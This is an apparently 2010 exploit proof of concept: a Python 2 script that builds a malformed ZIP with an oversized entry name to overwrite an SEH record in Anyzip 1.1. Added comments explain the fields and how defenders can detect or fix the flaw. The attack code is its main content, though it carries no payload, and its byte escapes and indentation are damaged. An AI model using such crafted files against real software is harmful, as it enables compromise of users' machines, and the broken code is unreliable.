# Title : Anyzip (.zip) v1.1 0day Poc (SEH)
# Published : 2010-04-07
# Author : ItSecTeam
#! /usr/bin/python
# Anyzip (.zip) 0day Poc (SEH)
# Homepage : www.tbsoftinc.com
# Download : www.tbsoftinc.com/download/anyzip.exe
# Version : 1.1
# Tested Os : Windows XP SP1/SP3 EN
# Usage : Python anyzip.py
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web : WwW.ITSecTeam.com
# Forum : WwW.forum.itsecteam.com
# Builds a single-entry ZIP archive whose only unusual property is the length
# of the stored file name, then writes it to "anyzip-poc.zip".
# NOTE(review): as captured on this page the byte escapes appear without their
# backslashes and the lines under try/except carry no indentation; this looks
# like extraction damage and the code is left exactly as found.
#
# Defender's view: the sizes below add up to a 4068-byte entry name. Names of
# that size are far beyond what Windows paths normally allow, so an archive
# scanner or mail/web gateway can reasonably flag any ZIP entry whose declared
# name length is this large. On the parser side the fix is to bound the
# declared name length against the destination buffer before copying.

# Local file header (begins with the "PK" 03 04 signature). The "e4 0f" pair
# reads as little-endian 0x0fe4 = 4068, matching the name built below.
# NOTE(review): individual field offsets were not checked against the ZIP
# specification here.
header_1 =("x50x4Bx03x04x14x00x00"
"x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00"
"xe4x0f"
"x00x00x00")
# Central directory entry ("PK" 01 02) repeating the same 4068-byte name length.
header_2 = ("x50x4Bx01x02x14x00x14"
"x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00x00"
"xe4x0f"
"x00x00x00x00x00x00x01x00"
"x24x00x00x00x00x00x00x00")
# End-of-central-directory record ("PK" 05 06). It declares one entry, with
# 0x1012 and 0x1002 in the size/offset positions, i.e. 4068 plus the lengths
# of the central (46-byte) and local (30-byte) headers above.
header_3 = ("x50x4Bx05x06x00x00x00"
"x00x01x00x01x00"
"x12x10x00x00"
"x02x10x00x00"
"x00x00")
# Two 4-byte values placed after 297 filler bytes. The names and the page
# title indicate they are meant to land on an SEH record (next pointer, then
# handler). The handler value is a hard-coded address.
# NOTE(review): presumably tied to the tested XP builds; not verified.
nseh="x41x41x41x41"
seh="x65x47x7ex6d"
payload = "A" * 297 + nseh + seh
# A five-byte stub the author calls a "predecoder". Nothing executable follows
# it in this PoC: everything after it is "B"/"C" filler.
predecoder = "x59x59x59x51x5c"
payload=payload+predecoder
# Pads the stub out to a fixed 100-byte region.
filltoebx="B" * (100-len(predecoder))
# Pads the name so that, with the ".txt" suffix, it totals 4068 bytes, which
# agrees with the length declared in both headers.
rest = "C" * (4064-len(payload+filltoebx)) + ".txt"
payload = payload+filltoebx+rest
# The name is emitted twice: once after the local header and once after the
# central directory entry. There is no file data between them.
exploit = header_1 + payload + header_2 + payload + header_3
# Python 2 script (print statement). The bare except reports every failure as
# a write error, whatever actually went wrong.
try:
f=open("anyzip-poc.zip",'w')
f.write(exploit)
f.close()
print "[+] File created successfully !"
except:
print "[-] Error cant write file to systemn"